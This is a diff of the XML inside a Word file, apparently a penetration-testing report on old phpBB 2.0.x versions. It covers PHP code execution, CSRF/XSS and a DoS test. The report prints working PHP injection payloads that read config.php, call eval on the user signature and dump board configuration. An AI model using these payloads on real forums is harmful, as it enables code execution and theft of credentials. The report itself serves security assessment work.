+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2648,8 +3849,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc446495297"/>
-      <w:bookmarkStart w:id="17" w:name="_Toc446495766"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc448693177"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Heading3Char"/>
@@ -2657,40 +3857,2366 @@
           <w:color w:val="auto"/>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Session Hijacking exploit</w:t>
+        <w:t>PHP code execution using profile signature</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Heading3Char"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> versions effected:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> phpBB2.0.22 and below</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vulnerability: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Any user with access to the admin panel can potentially post messages</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> incorporating PHP code within. With a small amendment to the URL of the posted message the PHP code included in the message can be executed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [7]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CVE Reference:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CVE-2006-1896 [8]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Methods of execution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Firstly on the administration panel located in style</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s admin &gt; management the style </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>subSilver</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is to be edited. Here the ‘font </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>colour</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3’ is modified with “’</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>./</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>’”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Now the user </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>navigates</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to their profile and sets the signature to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">$fd=fopen($phpbb_root_path.'config.php','rb');while(!feof($fd)){echo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>htmlspecialchars</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>fgets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>fd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">));}”. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Next all the user needs to do is post a message with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>*/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>var_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>dump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>eval</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>user_sig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>)).flush().die().</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Included and attach the signature. After viewing the post and appending the URL with highlight=1 the results of the executed PHP code are displayed on the forum page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc448693178"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Execution of Arbitrary PHP code by modifying </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>template.php</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="15"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> versions effected:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> phpBB2.0.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>9 and below</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Vulnerability:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A user with write access can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>effectively</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> execute arbitrary PHP code by modifying </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>template.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [9]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CVE Reference:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CVE-2006-1895</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [10]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Methods of execution:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If the user </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>make</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a simple modification to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>header.tpl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file where </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>switch_enable_pm_popup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is changed to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>switch_enable_pm_popup</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>;global</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>board_config;var_dump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>board_config</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>);exit;?&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>’ then any code after the semicolon can be executed as PHP code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc448693179"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CSRF (Cross Site Forgery Request)/XSS attack</w:t>
       </w:r>
       <w:bookmarkEnd w:id="16"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> versions effected:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vulnerability: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CSRF allows an attacker to effectively</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> perform unauthorized actions as a logged in user by exploiting links or image tags in another user’s session.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [11]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CVE</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="17" w:name="_Toc446495298"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Reference:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>CVE-2006-0438</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>[12]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc448693180"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Penetration/Attack</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc448693181"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>DOS (Denial of Service attack)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Figure 2 illustrates the CPU cycles of the system prior to running the Perl script (Appendix 1) discussed in the enumeration section of this report.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Figure</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Task Manager displaying CPU cycles before script is run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="366125B1" wp14:editId="47EFD855">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>left</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>13562</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5172075" cy="3122295"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5172075" cy="3122295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Command Prompt view of Perl script running</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
